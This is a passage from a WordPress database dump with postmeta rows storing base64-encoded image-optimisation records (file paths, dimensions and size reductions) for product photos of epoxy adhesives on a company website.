RzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MDkwLCJpZCI6MTE3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUwOTMsImlkIjoxMTcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxOTIsInRpbWUiOjE0ODM1NzUwOTUsImlkIjoxMTcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMzAsInRpbWUiOjE0ODM1NzUwOTgsImlkIjoxMTcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo4MCwidGltZSI6MTQ4MzU3NTEwMSwiaWQiOjExNzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NTEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9JTUdfMTI2NTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9JTUdfMTI2NTEtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUxMDMsImlkIjoxMTcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvSU1HXzEyNjUxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MTA2LCJpZCI6MTE3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY1MS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0lNR18xMjY1MS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0lNR18xMjY1MS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTEwOSwiaWQiOjExNzJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29716, 1151, 'wpfc_optimisation_reduction', '487707'); 
INSERT INTO `wp_postmeta` VALUES (29717, 1151, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LmpwZyIsIndpZHRoIjozMjAwLCJoZWlnaHQiOjMyMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQuanBnIiwicmVkdWN0aW9uIjo0ODcwMTEsInRpbWUiOjE0ODM1NzUxMTksImlkIjoiMTE1MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MTIxLCJpZCI6MTE1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtODAweDgwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtODAweDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtODAweDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUxMjQsImlkIjoxMTUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC03Njh4NzY4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC03Njh4NzY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTEyNywiaWQiOjExNTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTE2MDB4MTYwMC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTE2MDB4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUxMzEsImlkIjoxMTUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTEzMywiaWQiOjExNTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MTM2LCJpZCI6MTE1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUxMzgsImlkIjoxMTUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTE0MSwiaWQiOjExNTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjI2NCwidGltZSI6MTQ4MzU3NTE0MywiaWQiOjExNTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjI3NSwidGltZSI6MTQ4MzU3NTE0NiwiaWQiOjExNTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjE0NiwidGltZSI6MTQ4MzU3NTE0OCwiaWQiOjExNTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9lcG94eS1zdHJpcHBpbmctYWdlbnQtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzUxNTEsImlkIjoxMTUxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvZXBveHktc3RyaXBwaW5nLWFnZW50LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MTUzLCJpZCI6MTE1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Vwb3h5LXN0cmlwcGluZy1hZ2VudC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTE1NiwiaWQiOjExNTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29718, 1148, 'wpfc_optimisation_reduction', '1810169'); 
INSERT INTO `wp_postmeta` VALUES (29719, 1148, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQuanBnIiwid2lkdGgiOjM0OTgsImhlaWdodCI6MjY2NywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQuanBnIiwicmVkdWN0aW9uIjoxODEwMTU1LCJ0aW1lIjoxNDgzNTc1MTY3LCJpZCI6IjExNDgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NTE2OSwiaWQiOjExNDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC04MDB4NjEwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NjEwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTkwNy1lcG94eS1hZGhlc2l2ZS1raXQtODAweDYxMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTgwMHg2MTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc1MTcyLCJpZCI6MTE0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy05MDctZXBveHktYWRoZXNpdmUta2l0LTc2OHg1ODYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1ODYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtOTA3LWVwb3h5LWFkaGVzaXZlLWtpdC03Njh4NTg2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvY